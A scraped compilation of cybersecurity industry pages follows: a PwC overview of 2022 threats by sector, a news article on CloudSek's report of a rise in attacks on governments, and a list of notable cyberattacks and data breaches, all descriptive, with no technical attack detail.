Military secrets and sophisticated technologies make this highly sensitive and important sector a prime target every year by cyber threats. But 2022 proved especially challenging as threat actors worked hard to penetrate A&D organizations and contractors, particularly in Europe. Their motives ran the gamut:

Espionage-motivated threat actors wanted research and development secrets as well as military plans and capabilities.

Saboteurs, hoping to weaken a rival’s defences, might try to inhibit research or halt production.

Ransomware attackers were willing to bet that high-value, defence contracting companies would pay to recover sensitive data. They often upped the ante by threatening to publish ransomed data on leak sites to collect from victims a second time.

Motivations: Cyber crime, espionage

The auto industry is speeding along on the digital highway, transforming rapidly and perhaps more completely than many other sectors.

Automakers must secure not only the software and hardware that make up their vehicles but also the factories that manufacture them. Their distributors and suppliers are targets, as well.

Ransomware operators hit the automotive supply chain worldwide in 2022 and posted information on leak sites from 75 organisations. Many of these incidents brought operations to a standstill and left manufacturers without needed parts or equipment.

We also saw evidence of espionage, including compromises resulting in threat actors stealing sensitive and proprietary information from victims.

Motivations: Cyber crime, espionage, sabotage, hacktivism

The many builders, engineers and suppliers who must work together on construction projects increasingly use digital technologies to operate and connect. Each is vulnerable to intruders who seek primarily, in this sector, money and information.

Among ransomware leak site victims in 2022, 10% were in construction and engineering, making it number two among sectors. Only manufacturing suffered more ransomware-generated leaks.

Meanwhile, espionage agents sought to steal information or halt operations in the moment and to plant the seeds for doing so later. Their attacks stood to affect projects linked to government agencies, public infrastructure, and the public interest, including water and utilities, transportation, public buildings and even corporate facilities.

Motivations: Espionage, cyber crime, sabotage

Knowledge is power. Espionage-motivated threat actors know this, and have targeted academia for sensitive data and research, as well as information on researchers.

Attackers have more ways to get in than ever before. Partly as a result of the COVID-19 pandemic, so much of learning itself now happens online, and school administrations have increasingly gone digital. Each new connection, device and platform expands the attack surface of educational systems and networks.

Ransomware attacks had an immense impact on this sector in 2022, and cyber criminals dominated headlines, as victims in many cases were forced to shut down operations while systems were being restored. Education’s traditional role as an open space for the free exchange of ideas and information may make the sector an easier target. We saw hundreds of schools’ data and systems around the world held for ransom in 2022.

Among the most critical of infrastructure and most important of resources, energy has become a prime target for cyber criminals and other threats. But the stakes rose in 2022.

Last year we saw espionage-motivated threat actors and saboteurs targeting energy producers and distributors as a complement to conventional warfare. The intruders had often positioned themselves in advance, breaching systems to gain a foothold in victim networks, gather information and plant malware for future use. Hacktivists also re-emerged and targeted energy sector organisations in 2022, often through DDoS attacks.

Ransomware attacks, too, increased, with actors frequently using double extortion to coerce victims. In exchange for the first payment, they’d decrypt the victims’ data. The second would keep them from posting the stolen data on leak sites or selling it.

Perhaps not surprisingly, money was the ultimate driver for threat actors targeting financial services (FS) in 2022. Ransomware hit FS hard in 2022: the sector accounted for 5% of all ransomware leak site victims. Cryptocurrency theft resulted in the loss of millions of US dollars, as well. And fraud was an ongoing concern as threat actors used cyber methods to buy items using others’ payment cards, hack into financial accounts, commit identity theft, and conduct other fraudulent acts.

But money wasn’t the only objective. Some used sabotage to slow and even halt financial transactions and stymie the flow of money, aiming to cripple economies. And threat actors continued to slip in to view sensitive financial data and systems.

Adversaries, eyeing the sensitive information that governments collect and maintain, carried out sophisticated attacks in acts of cyber espionage in 2022.

Saboteurs, too, were active. They attempted to disable or disrupt government services and destroy or manipulate sensitive information and communications. They also released disinformation and leaked data regarding high-profile events and issues.

Opportunistic cyber criminals, too, targeted the government. They followed headlines to launch ransomware attacks on public agencies and organisations. And as world events and tensions evolved, they injected themselves into geopolitical conflicts.

Motivations: Cyber crime, espionage, sabotage

Healthcare perhaps faced the most peril from cyber threats of any sector, with people’s very lives potentially at stake. And as providers’ and patients’ use of technology grew, so did opportunities for theft and worse.

Espionage by those seeking personal and proprietary information remained a concern, as did sabotage that might shut down systems and compromise patient care. But ransomware posed the greatest threat in 2022.

The damage that threat actors can do is vast in a cyber attack: they can bring down entire networks, affecting patients, providers, third parties, operators, facilities and more.

Motivation: Cyber crime, espionage, sabotage, hacktivism

Operational technology (OT) took center stage among cyber concerns in 2022 as factories continued to digitise, moving toward increased automation. Each new connection poses a new cyber threat, number one of which is ransomware.

A ransomware attack that freezes or shuts down a factory’s OT costs revenue and time, and could endanger workers. Cyber criminals are making use of these concerns, first striking and then attempting to extort for profit. Manufacturing companies ranked number one (15%) among ransomware leak site victims in 2022.

A production halt can ripple up and down the supply chain and exacerbate other shortages, as happened last year. Critical infrastructure, government, business, suppliers and distributors could all suffer losses.

On our 2023 watchlist: semiconductor manufacturing, as the US and others continue to impose restrictions. Cyber criminals are savvy about world events, and are certainly watching.

Research is the lifeblood of pharma, but it’s also a prime attractant for espionage.

As companies rely on technologies to advance their research and produce groundbreaking medicines ever more rapidly, they also create incentives for cyber criminals to break in and provide them with more avenues through which to do so.

Espionage-motivated threat actors abound, working to infiltrate laboratories via third parties, Internet of Things (IoT) technologies, cloud environments, software misconfigurations and more to view and steal sensitive and proprietary information and disrupt production.

The stakes go far beyond a product or pill, and even beyond such high profile projects as the development of new vaccines and other lifesaving treatments. Bad actors can also undercut companies’ profits and cause regulatory problems and reputational damage. In 2022, we saw them use ransomware to extort pharma and life sciences companies: Pay or suffer the consequences.

Threat actors want badly what professional services (PS) companies have: namely, a wealth of project and operations information as well as sensitive proprietary, personal and financial data about clients in the private and public sectors.

Threat actors often target PS organisations with fraud in mind, using these companies’ compromised networks to access their clients’ data. Or they may use access to email accounts to conduct convincing spoofing, phishing and social engineering campaigns.

But money remains a significant motivator in PS breaches. Among victim data posted to ransomware leak sites in 2022, 9% came from professional services, making it the third highest sector last year among ransomware leak site victims.

As more PS organizations use the cloud and other technologies, we expect to see threat actors work more diligently to compromise these services as well as to circumvent identity and access management (IAM) controls.

The retail industry is a cash cow for cyber criminals and fraudsters. As the use of contactless payments grew in 2022, we saw more widespread use of phony processing applications to steal customer data, including payment card information.

Threat actors may use customers’ credentials to gain access to their retail accounts and make fraudulent purchases of items that they then return for a refund to their own accounts — a popular tactic in 2022.

Attackers also may disable retailers’ online marketplaces for ransom, effectively shutting down business. The retail sector was the fourth hardest hit among ransomware leak site victims last year and accounted for 8% of all organisations leaked by ransomware threat actors.

Such a competitive industry is bound to have its share of cyber espionage, as well. As retailers and developers create and patent their own software and technologies in heated competition, they face the enduring balancing act of security vs. speed. Threat actors can then slip in to view companies’ proprietary information and their customers’ personally identifiable information (PII), payment information, and online behaviours.

Sports and entertainment has become a highly transactional, technology-driven, on-demand service — one that suffered an onslaught of cyber attacks in 2022.

Interrupting scheduled events can cost sports and entertainment organisations a lot of money. This includes content creators and owners, teams, venues and platforms. Criminals capitalized on this vulnerability, timing ransomware deployments to coincide with time-sensitive events. We anticipate more such attacks in 2023.

Threat actors pilfered from fans and subscribers, as well, intercepting their purchases to steal payment card information, for instance.

And they stole embargoed media, then leaked it for money or notoriety, as we saw in one widely publicised instance in 2022.

In the digital age, technology all but makes the world go around, making it a prime target for power-and-money-hungry cyber criminals and espionage-motivated threat actors.

Its omnipresent reach, extending into every sector, prompted threat actors to break into managed service providers, cloud service providers, and other widely-used services that provided access to users’ systems and networks.

Sophisticated cyber intrusions slipped into enterprise systems via software updates or systems maintenance tasks. Others used social engineering to exhaust security mechanisms and exploit users for granting access.

Then, lurking inside their victims’ networks, a range of threat actors stole proprietary secrets and personal data, disrupted supply chains, launched attacks and damaged trust along the digital supply chain.

This somewhat beleaguered sector suffered hits from a variety of threat actors, sometimes suffering punches from all sides in quick succession.

And because its data and telemetry contain much confidential intelligence, espionage-motivated actors focused keenly on telco, eager to scale their targeting and reconnaissance operations and enable future attacks.

Transportation and Logistics

The global supply chain links most critically in the transportation and distribution of raw materials and goods. The risks increased as companies connected more systems through operational technology (OT) and industrial control systems (ICS). We saw threats to transport and logistics not only grow, but also become more sophisticated.

The consequences could be dire. We saw an attack shut down one country’s entire railway system.

Supply chain and sector interdependencies in 2022 made it more and more likely that an incident might enormously affect not only the breached company but also its customers and third parties. Ransomware actors seized on this likelihood, often targeting transport and logistics firms in aggressive attacks.

Get the latest insights on threat actors, trends, tools and motivations throughout the cyber threat landscape.

Download the report

Umang Handa

Partner, National Cybersecurity Managed Services Leader, PwC Canada

Tel: +1 416 815 5208

Cristina Onosé

Lead, Privacy Advocacy and Thought Leadership, PwC Canada

Tel: +1 416 687 8104

Kris McConkey

Global Threat Intelligence Lead Partner, PwC United Kingdom

Tel: +44 (0)7725 707360

Rachel Mullan

Global Threat Intelligence Lead, Director, PwC United Kingdom

Jason Smart

Global Threat Intelligence Lead, Director, PwC Australia

Tel: +44 (0)7718 979 308

Allison Wikoff

Global Threat Intelligence Lead, Director, PwC US

Global Threat Intelligence Lead, Director, PwC Sweden

© 2017 - 2024 PwC. All rights reserved. PwC refers to the PwC network and/or one or more of its member firms, each of which is a separate legal entity. Please see www.pwc.com/structure for further details.

Legal notices
Cookie policy
Legal disclaimer
Terms and conditions

Artificial Intelligence
Generative AI
Business Operations
IT Leadership
Application Security
Business Continuity
Cloud Security
Critical Infrastructure
Identity and Access Management
Network Security
Physical Security
Risk Management
Security Infrastructure
Vulnerabilities
Software Development
Enterprise Buyer’s Guides
United States
United Kingdom
Newsletters
Foundry Careers
Terms of Service
Privacy Policy
Cookie Policy
Member Preferences
About AdChoices
E-commerce Links
Your California Privacy Rights

Our Network

Computerworld
Network World

Cyberattacks against governments jumped 95% in last half of 2022, CloudSek says

India, the us, indonesia, and china accounted for 40% of the total reported cyberattacks in the government sector..

president joe biden meets with russian president vladimir putin in geneva switzerland shutterstock

The number of attacks targeting the government sector increased by 95% worldwide in the second half of 2022 compared to the same period in 2021, according to a new report by AI-based cybersecurity company CloudSek.

The increase in attacks can be attributed to rapid digitization and the shift to remote work during the pandemic, which broadened the attack surface of government entities and paved the way for an increase in cyberwarfare waged by nation-state actors, according to the report.

Government agencies collect and store huge amounts of data, which include information about individual citizens that can be sold on the dark web . There is also a risk that national security and military data can be used by terrorist organizations.

Increase in hacktivism and ransomware

In 2022 there was an increase in so-called hacktivist activity — hacking for political purposes — which accounted for about 9% of the recorded incidents reported in the government sector. Ransomware groups accounted for 6% of the total incidents reported. LockBit was the most prominent ransomware operator, the report noted.

The number of government-sponsored attacks has also multiplied. This increase is due to the advent of offerings such as initial-access brokers and ransomware-as-a-service .

“These statistics are suggestive of the fact that cyberattacks in this particular industry are no longer limited to financial gains; rather, they are now used as a means to express support or opposition for certain political, religious, or even economic events and policies,” the report said.

“Threat actors have started developing and advertising services of dedicated criminal infrastructure which can be bought by governments or individuals and used for various nefarious purposes,” the report added.

Meanwhile, the average total cost of a breach in the public sector increased from $1.93 million to $2.07 million — a 7.25% increase between March 2021 and March 2022 — according to IBM.

KelvinSecurity, AgainstTheWest are most prominent threat actors

KelvinSecurity and AgainstTheWest were the two most prominent threat actors last year, according to Cloudsek. The two groups were the most prominent in 2021 as well.

KelvinSecurity, operating under the handle Kristina, uses targeted fuzzing and exploits common vulnerabilities to target victims. The group shares their tools for free and targets victims with common underlying technologies or infrastructure. The group publicly shares information such as new exploits, targets, and databases on cybercrime forums and Telegram . They also have a data-leak website where other threat actors can share databases, the CloudSek report notes.

AgainstTheWest started operations in October 2021 and identifies itself as APT49 or BlueHornet. It is focused on exfiltrating region-specific data and selling it on the dark web. The group has launched campaigns such as Operation Renminbi, Operation Ruble, and Operation EUSec, which targeted various countries. They also collaborate with different threat actors.

“A confidential source in contact with the group ascertained that the group was exploiting SonarQube zero-day and Swagger UI vulnerabilities,” the CloudSek report noted. SonarQube is an open-source tool by SonarSource that automates code inspections; Swagger is a set of tools for API developers from SmartBear Software.

India, US, and China are most affected

India, the US, Indonesia, and China continued to be the most targeted countries in the past two years, accounting for 40% of the total reported incidents in the government sector.

The attacks on the Chinese government were mainly attributed to APT groups. AgainstTheWest’s campaign Operation Renminbi was responsible for almost 96% of attacks against China, the report noted. The operation began as retaliation for China’s activities against Taiwan and the Uyghur community. Allegations that China was responsible for the outbreak of the pandemic also contributed to the increase in attacks.

The Indian government was the most frequently targeted in 2022 due to the hacktivist group Dragon Force Malaysia’s #OpIndia and #OpsPatuk campaigns. Several hacktivist groups joined and supported these campaigns, which led to further attacks. Government agencies in India have become popular targets of extensive phishing campaigns, the report noted.

After Russia attacked Ukraine, several state-sponsored actors and activists showed their support for Ukraine by attacking Russia . Attacks against Russia increased by over 600% during the year, as the Russian government became the fifth most targeted public sector in 2022.

To prevent future attacks government agencies need to shift to a zero-trust model , wherein it is assumed that the user identities or the network itself may already be compromised, proactively verifying the authenticity of user activity, CloudSek noted.

More from this author

Auditboard launches new it risk management offering, opsec slip-up reveals the threat actor behind jumpcloud hack, lazarus group exploits windows iis servers to distribute malware, vast majority of organizations are no longer vulnerable to moveit, initial access broker posts targeting banks increase on dark web, wormgpt: a generative ai tool to compromise business emails, fake poc with data-stealing malware discovered on github, wolf im schafspelz: fake-malware-poc stiehlt forscherdaten, show me more, hackers are cloning yubikeys via new side-channel exploit.

New ALPHV-like ransomware targets VMware ESXi servers

‘Unusual’ Voldemort cyberespionage attack impersonates tax authorities

CSO Executive Sessions: Guardians of the Games - How to keep the Olympics and other major events cyber safe

CSO Executive Session India with Dr Susil Kumar Meher, Head Health IT, AIIMS (New Delhi)

CSO Executive Session India with Charanjit Bhatia, Head of Cybersecurity, COE, Bata Brands

Cybersecurity Insights for Tech Leaders: Addressing Dynamic Threats and AI Risks with Resilience

Recent Cyber Attacks

Read about the latest cyber attacks and discover trends organizations should be aware of.

Recent Cyber Attacks from 2023

Under normal business circumstances, cyber attacks are an ever-increasing problem causing trillions of dollars in losses. To make matters worse, the war between Russia and Ukraine exacerbated these problems with a flurry of major politically-motivated cyber attacks in 2022. Here are some of the recent cyber attacks.

Hot Topic attacks

In August 2023, American retailer Hot Topic notified its customers they had detected automated attempts by unauthorized third parties to log into customer accounts on both their website and their mobile app. The attack involved "valid account credentials (e.g., email addresses and passwords) obtained from an unknown third-party source."

Prospect Medical Holdings ransomware attack

In August 2023, more than one of Prospect Medical's offices, facilities, and hospitals were forced offline by a ransomware attack. The company closed a few of its outpatient facilities and informed patients and families of the attack via its Facebook pages and websites. News organizations following the story reported that medical staff switched to manual information procedures while the network was offline.

Global Threat Landscape Report 2H 2023

FortiGuard Labs Global Threat Landscape Report 2H 2023 shows Cybercriminals Exploiting New Industry Vulnerabilities 43% Faster than 1H 2023.

Cyber Attacks in 2022

Finnish parliament attack.

In August 2022, the Finnish parliament 's website experienced a DDoS attack while the parliament was in session. This denial-of-service attack may be part of a coordinated campaign by Russian state-sponsored hackers to disrupt the Finnish government’s websites in retaliation for the application to join NATO. A DDoS attack temporarily blocks access to a website but does not cause permanent destruction.

Ukrainian state nuclear power company attack

The Russian “hacktivist” group called the People’s Cyber Army engaged 7.25 million bots in August 2022 in a bot attack to take the Energoatom website down. It used a flood of garbage web traffic and webpage requests. A disruption of online services lasted for a few hours, but no permanent negative impact remained. The attack was part of a Russian psyops campaign to create fear of a nuclear disaster and terrorize Europeans.

Greek natural gas distributor attack

Greek national gas distributor DESFA reported an incidence of a cyber attack in August 2022. The attack impacted part of the company’s IT infrastructure and caused a data leak . The ransomware operation of cybercriminals called Ragnar Locker is holding the stolen data hostage. They demand ransom not to expose sensitive data. The company refused to make a payment.

South Staffordshire Water Company attack

In August 2022, the South Staffordshire Water Company reported an attack that caused a network disruption in its internal corporate network and a data loss. A cybercriminal ransomware group threatened to tamper with the water supplied by the company. The company disputed this claim. The criminals demanded payment to not release sensitive files and explain how the network breach happened.

Montenegro government attack

The government of Montenegro's digital IT infrastructure reported an unprecedented cyberattack in August 2022. No data breach occurred . However, certain governmental services and telecommunications experienced disruption, including border crossings and airport operations. The state-owned utility company, EPCG, switched to manual operations as a precautionary measure.

Estonian government attack

A DDoS attack disrupted many Estonian government websites for several hours in April 2022. The attack targeted websites for the president, the Ministry of Foreign Affairs, the Police and Border Guard, the identification card webpage, and the state services digital portal. Estonia’s condemnation of the Russian war on Ukraine makes the country a target for Russian hackers.

Islamic Culture and Communication Organization attack

The Iranian Islamic Culture and Communication Organization (ICCO) experienced a severe attack in July 2022. Six ICCO websites went down, and 15 others changed to photos of Massoud Rajaivi, the Iranian Resistance leader. Additionally, there was data destruction on 44 servers and hundreds of computers. The ICCO also lost 35 databases with highly-confidential information about money laundering, spies, and terrorists living abroad.

Belgian government and military attack

In July 2022, the Belgian government announced that three Chinese hacker groups, part of the known Chinese Advanced Persistent Threat actors , attacked Belgian public services and military defense forces. The Chinese government-sponsored attackers steal trade secrets and intelligence information. The Soft Cell Chinese group recently launched a new remote access trojan (RAT) malware in June 2022.

UK military social media breach

Hackers took over the Twitter account of the British Army in July 2022. The social media account underwent multiple name and photo changes. The content started promoting contests to win Angry Apes non-fungible tokens (NFTs), digital art stored on a blockchain. The army’s YouTube page experienced an attack as well. Its name changed to Ark Invest, and the account promoted interviews of Elon Musk talking about cryptocurrency.

Lithuanian energy company attack

A DDoS attack in July 2022 blocked access to the website of the Lithuanian energy company, Ignitis Group . The company managed the attack and limited the damage using DDoS Protection . No data breach occurred, but the attacks were persistent and ongoing. Pro-Russia group Killnet claimed responsibility. The attack retaliated against Lithuanian support of Ukraine in the war with Russia.

Additional Global Cyber Attacks

Proxylogon cyberattack.

One of the most damaging recent cyberattacks was a Microsoft Exchange server compromise that resulted in several zero-day vulnerabilities. The vulnerabilities, known as ProxyLogon and initially launched by the Hafnium hacking group, were first spotted by Microsoft in January and patched in March. However, more groups joined Hafnium in attacking unpatched systems, resulting in thousands of organizations being compromised.

MeetMindful cybersecurity breach

Dating app MeetMindful suffered a cybersecurity attack in January 2021, resulting in data of more than 2 million users being stolen and leaked. The hacking group behind the event managed to steal information like users’ full names and Facebook account tokens.

Tether attack

In March 2021, cyber criminals threatened to leak documents from the Tether cryptocurrency. The attackers claimed the data would “harm the Bitcoin ecosystem” and demanded a settlement fee of around 500 Bitcoin ($24 million), but Tether refused to pay.

CNA financial breach

A ransomware attack on insurance firm CNA Financial left employees locked out of their systems and blocked from accessing corporate resources. The attack in March 2021 also involved company data being stolen, which led CNA Financial to reportedly pay the $40 million settlement fee.

Facebook cyberattack

Data of more than 530 million Facebook users, including their names, Facebook IDs, dates of birth, and relationship status, was published online in April 2021. Facebook, now Meta, said the information was obtained through scraping in 2019.

Colonial Pipeline attack

The growing threat that advanced cybersecurity attacks pose to the world was highlighted by the Colonial Pipeline attack in May 2021. The fuel pipeline operator suffered a ransomware attack launched by the DarkSide hacking group, which led to fuel disruption and mass panic buying across the U.S.

Omiai cyberattack

An unauthorized entry cyberattack in May 2021 resulted in the exposure of 1.7 million users of the Japanese dating app Omiai.

Audi and Volkswagen cybersecurity breach

In June 2021, Audi and Volkswagen revealed a data breach had affected more than 3.3 million customers and prospective buyers, who were primarily U.S.-based. The breach was blamed on an associated vendor, which was purportedly responsible for exposing the data between August 2019 and May 2021.

Guntrader.uk cyberattack

The United Kingdom’s trading website for guns and shooting equipment revealed that records of 100,000 gun owners had been stolen and published online in July 2021. Gun ownership is strictly controlled in the U.K., so the data breach of customers’ names and addresses caused significant privacy and safety concerns.

T-Mobile attack

In August 2021, telecoms firm T-Mobile suffered a cybersecurity breach that led to the data of around 50 million existing customers and prospects being stolen. The data, which included customer addresses, drivers' licenses, and social security numbers, was stolen by a 21-year-old, who claimed to have obtained around 106GB of information.

Poly Network breach

An attack on Poly Network in August 2021 proved that cybersecurity breaches on cryptocurrency firms are on the rise. The blockchain firm revealed an Ethereum smart contract hack resulted in cyber criminals stealing cryptocurrency worth more than $600 million.

AP-HP attack

Cybersecurity attacks on medical organizations and healthcare firms are also increasing. As a result of the hack on AP-HP, a Paris public hospital system, in September 2021, cyber criminals stole personal data belonging to around 1.4 million people who were tested for COVID-19 in 2020.

Cream Finance breach

Cream Finance, a decentralized finance firm, suffered a vulnerability in its project’s market system. The hack, which was revealed in September 2021, caused losses worth $34 million.

Debt-IN Consultants cyberattack

A South African debt recovery company suffered a significant attack that led to client and employee data being illegally accessed from its servers in September 2021. The incident is suspected to have affected the personally identifiable information (PII) , including owed debts, of over 1.4 million people.

Neiman Marcus data breach

Department store Neiman Marcus suffered a data breach that resulted in the exposure and theft of up to 3.1 million customers’ payment card details. The attack was detected in September 2021 but began in May 2020, and most of the data stolen was believed to have been from expired or invalid cards.

Argentinian government attack

A hacker, who claimed to have leaked the entire database of Argentina’s National Registry of Persons, has allegedly stolen the data of more than 45 million Argentinian residents. However, the government denied the hack.

Squid Game cyberattack

The value of a cryptocurrency linked to but not officially associated with the Netflix program Squid Game plummeted after a suspected exit scam in November 2021. The cryptocurrency’s value dropped from $2,850 to $0.003028 overnight, which resulted in investors losing millions of dollars.

Robinhood trading app breach

Also in November 2021, a data breach of the trading app Robinhood affected the data of around 5 million users. Data like usernames, email addresses, and phone numbers were compromised through a customer support system.

BitMart cyberattack

Yet another cybersecurity attack against digital currencies, BitMart suffered a breach that enabled cyber criminals to steal approximately $150 million worth of cryptocurrency in December 2021. The attack resulted in total losses of around $200 million, including damages.

Log4j breach

In December 2021, a zero-day vulnerability was discovered in the Log4j Java library. The remote code execution flaw is now active, and the resulting bug, Log4Shell, is being activated by botnets like Mirai.

Kronos cyberattack

HR platform Kronos suffered a ransomware attack that took the Kronos Private Cloud offline. The outage occurred shortly before Christmas and took the vital service down for several weeks.

Experian security breach

In August 2020, credit reporting agency Experian suffered a breach that affected 24 million consumers in South Africa and more than 793,000 businesses. The incident occurred when an individual who claimed to be a client requested services that prompted the data’s release. The stolen data was eventually secured and deleted, while Experian revealed it had not been used fraudulently and that its customer database, infrastructure, and systems had not been compromised.

MGM hotel attack

The data of more than 10.6 million customers of MGM Resorts hotels was leaked to a hacking forum in February 2020. The data included addresses, dates of birth, email addresses, names, and phone numbers belonging to celebrities, business executives, government employees, and tourists.

However, the hack did not breach users’ credit card details. The incident began in mid-2019 when MGM discovered unauthorized access to its server. Another data breach followed in February 2020, which saw user data published on an open, accessible forum.

California University cyberattack

The University of California, based in San Francisco, suffered a ransomware attack that led to hackers demanding a settlement payment of $3 million on June 1, 2020. The university’s system was targeted by malware that could encrypt various servers and steal and encrypt critical data. The university negotiated and paid a settlement fee of $1.14 million but later revealed no data had been compromised.

Cognizant Technology Solutions Corp. cybersecurity breach

Technology and consulting firm Cognizant was affected by the Maze ransomware attack on April 18, 2020. The attackers stole data and threatened to publish it online unless Cognizant paid a settlement fee. Cognizant later revealed it paid a ransom fee of between $50 million and $70 million to restore its services.

Tillamook County cyberattack

Tillamook County’s IT systems were infected by encryption malware on January 22, 2020. The attack shut down its computer and phone systems and took down the website that hosts its various departments. Tillamook County’s computer systems were down for at least two weeks, and attackers demanded $300,000 as settlement , which would double after two weeks, to restore the data. The county tried to avoid paying the settlement fee but could not restore the data and eventually settled.

As the COVID-19 pandemic broke, an attack targeting the World Health Organization (WHO) resulted in the breach of 25,000 email addresses and passwords. The data was leaked online on April 19, 2020, along with information belonging to other groups fighting the pandemic, including the Gates Foundation, the National Institutes of Health (NIH), and the U.S. Centers for Disease Control and Prevention (CDC).

Zoom conferencing service breach

Videoconferencing service Zoom saw a massive increase in activity throughout 2020 with people working from home and speaking to friends and family through the application. However, in April 2020, a cyberattack known as Zoombombing enabled cyber criminals to join private meetings, access conversations, and share offensive images, videos, and screens. Zoom updated its application to enhance security levels.

Mitsubishi Electric cyberattack

A Mitsubishi Electric systems data breach resulted in around 200 MB of files being stolen. The breach, which was first detected in June 2019 but was reported in January 2020, contained employee and applicant information, data about retired employees from affiliate companies, and sales and technical material. The attack was caused by a vulnerability in the organization’s antivirus solution, which Chinese hackers exploited.

Hacker theft of 18 companies' data

One of the most significant cyber attacks that occurred in 2020 was through a hacker known as ShinyHunters. The hacker stole around 386 million user records from 18 different companies between the start of the year and July. The attacker posted links to these companies’ databases, made them freely available to download, and sold data online.

Biggest Data Breaches

Cyber-attacks pose a significant threat to businesses of all sizes, government agencies, and individual internet users. Recent cyber-attacks have come from hacktivist groups, lone wolf hackers, and nation-states.

The first cyber-attack on record was The Morris Worm in 1988. Robert Tappan Morris, a graduate student at Cornell University, developed a worm program that would crawl the web to count how many computers were connected to the internet. However, the worm installed itself on one in seven computers and forced them to crash, which saw it inadvertently become the first distributed denial-of-service (DDoS) attack . The Morris Worm damaged around 6,000 computers, which then comprised 10% of the entire internet.

In 2002, the first internet attack as we now know it saw a DDoS attack target the 13 Domain Name System (DNS) root servers. The attack could have brought the internet down if allowed to continue and was then the most sophisticated and widescale cyber-attack ever launched.

Recent cyber-attacks have advanced and can affect vast numbers of people. Single attacks now regularly steal the data of hundreds of millions of people.

Below is an overview of some of the most significant cyber-attacks recorded in history.

Cyber attacks in the Russia-Ukraine conflict

The Russia-Ukraine crisis , which began in February 2022, involved not just physical battles that displaced thousands and killed many—but cyberattacks as well. FortiGuard Labs has determined that new viper malware was used to attack Ukrainian targets and discovered it installed on at least several hundred machines in Ukraine. Several Ukrainian organizations have also been targeted by sophisticated attacks that used the KillDisk and HermeticWiper malware strands, which appear to destroy data on devices.

In addition, a tool that remotely controls devices, Remote Manipulator System (RMS), was found to have been distributed in Ukraine via fake “Evacuation Plan” emails. Ukraine also suffered a wave of distributed denial-of-service (DDoS) attacks. This included an attack targeting the State Savings Bank , which impacted banking services and cash withdrawals from ATMs, as well as disrupted the Ministry of Defence and Armed Forces networks.

Adobe cyber attack

In October 2013, software company Adobe suffered a cyber-attack in which hackers stole credit card data from nearly 3 million customers. The attack also saw login credential data, including usernames and hashed passwords, of up to 150 million users stolen. Further research into the attack discovered that the hackers had also stolen customer names, identification data, passwords, and more debit and credit card data.

It also paid around $1 million to customers as a financial settlement because of unfair business practices and violating the Customer Records Act. Furthermore, the settlement included a provision that Adobe should implement security measures and submit the results of an independent security audit one year after the final settlement date.

Canva security breach

In May 2019, the graphic design website Canva suffered an attack that exposed email addresses, names, cities of residence, passwords, and usernames of 137 million users. Hackers were also able to view but not steal files that included partial payment and credit card data.

The attackers, known as GnosticPlayers, contacted the technology news website ZDNet to boast about the attack. They claimed to have obtained users’ open authorization ( OAuth ) login tokens, which are used for logging in via Google.

Canva confirmed the attack, notified its users, and prompted them to update their passwords and reset their OAuth tokens. But a list of 4 million Canva accounts and stolen passwords was later shared online, which resulted in Canva having to invalidate any passwords that remained unchanged.

Dubsmash attack

More than 162 million users’ data—email addresses, hashed passwords, dates of birth, and usernames—was stolen from the video messaging service Dubsmash in December 2018. A year later, the data was made available for sale on dark web site Dream Market as part of a dump of data that also included information from attacks on Armor Games, Coffee Meets Bagel, MyHeritage, MyFitnessPal, and ShareThis.

Dubsmash acknowledged that its systems had been breached and the stolen data put up for sale, and advised users to change their passwords. However, it has not reported how attackers gained access to the data or confirmed the attack scale.

eBay data breach

A cyber attack in May 2014 exposed the account list of eBay’s 145 million users. The attack, which exposed user addresses, dates of birth, names, and encrypted passwords, occurred as hackers obtained three eBay employees’ credentials. Attackers gained complete access to the entire eBay network for 229 days.

eBay asked customers to update their passwords, for which it received criticism over its poor communication and password-renewal process implementation. The auction site also advised that financial details, such as credit card information, were stored in a separate location and had not been compromised.

LinkedIn cyber attack

The business social network LinkedIn is a common target for cyber criminals launching social engineering attacks . It has also suffered major cyber attacks that leaked its users’ data.

The first came in 2012, when 6.5 million hashed passwords were stolen then posted on a Russian hacker forum. The attack’s true size was revealed four years later when a hacker was discovered selling 165 million LinkedIn users’ email addresses and passwords for 5 bitcoins, which were then worth around $2,000. LinkedIn acknowledged the breach and reset passwords on all accounts that had been affected.

Slack attack

Collaboration platform Slack was affected in 2015 when hackers gained unauthorized access to the service’s infrastructure. This included a database storing user profile data, such as usernames and hashed passwords. The attackers also injected code that enabled them to steal plaintext passwords when users entered them.

Slack revealed the attack affected around 1% of its users, estimated to be around 65,000 users. It immediately reset their passwords and advised all users to reset their passwords and implement security measures like two-factor authentication (2FA) .

Four years later, a Slack bug bounty program revealed a potential compromise of Slack credentials, which it suspected was due to malware or users recycling passwords across online services. It subsequently realized that most of the credentials affected were from accounts that accessed the service during the 2015 incident.

Yahoo! cybersecurity breach

Cyber attacks targeting the internet provider Yahoo are widely acknowledged as the most significant data breaches in history. The state-sponsored attacks, which began in 2013, affected all of Yahoo’s 3 billion users.

In September 2016, Yahoo revealed a 2014 attack that compromised 500 million users’ names, email addresses, telephone numbers, and birth dates. Three months later, the company revealed a breach from 2013, which was carried out by another attacker and compromised its users' names, email addresses, passwords, dates of birth, and security questions and answers. Yahoo initially estimated that the 2013 attack affected 1 billion users but later changed that to its entire user base of 3 billion people.

Zynga attack

Games developer Zynga, which created various popular games that users accessed via Facebook, suffered a massive cyber attack in September 2019. The attack by Pakistani hacker group GnosticPlayers, who also claimed the Canva attack, accessed the database of Zynga games Draw Something and Words With Friends. It compromised the email addresses, hashed passwords, phone numbers, and Facebook and Zynga user IDs of 218 million people.

Cybersecurity Trends

The volume of cybersecurity incidents is expected to increase through 2022—not to mention the damage victims will incur as a consequence. Trends that organizations need to be aware of include:

Increased hardware usage: Software programs enable businesses to achieve great results and form new strategies. However, they are also highly attractive to cyber criminals. As a result, moves toward hardware are expected to gather speed, although businesses should not reduce their investments in upgraded software.
Remote work attacks: Cyberattacks targeting remote workers are expected to increase further through 2022. Hackers are constantly evolving their tactics in line with employees’ ways of working and will continue to take advantage of potential downtime and network vulnerabilities.
Growing government interest: Attacks on critical infrastructure have attracted the attention of global government agencies. 2022 will likely see increased investment and new regulations that aim to prevent massive cyberattacks against high-priority targets.
Ransomware targeting SMBs: Cyber criminals rarely discriminate based on the size of businesses. As governments increase investment to defend critical infrastructure, ransomware groups will shift their focus to target small and medium-sized businesses (SMBs) who have less funding, staffing, and security expertise.
The rise of AI defenses: The increasing sophistication of various cybersecurity incidents in 2021 means organizations need to improve their defenses. Artificial intelligence (AI)-powered solutions will enable smarter, faster, more proactive security that plugs the existing gaps in the cybersecurity industry.

Cybersecurity Resources

Cybersecurity
Types of Cyber Attacks
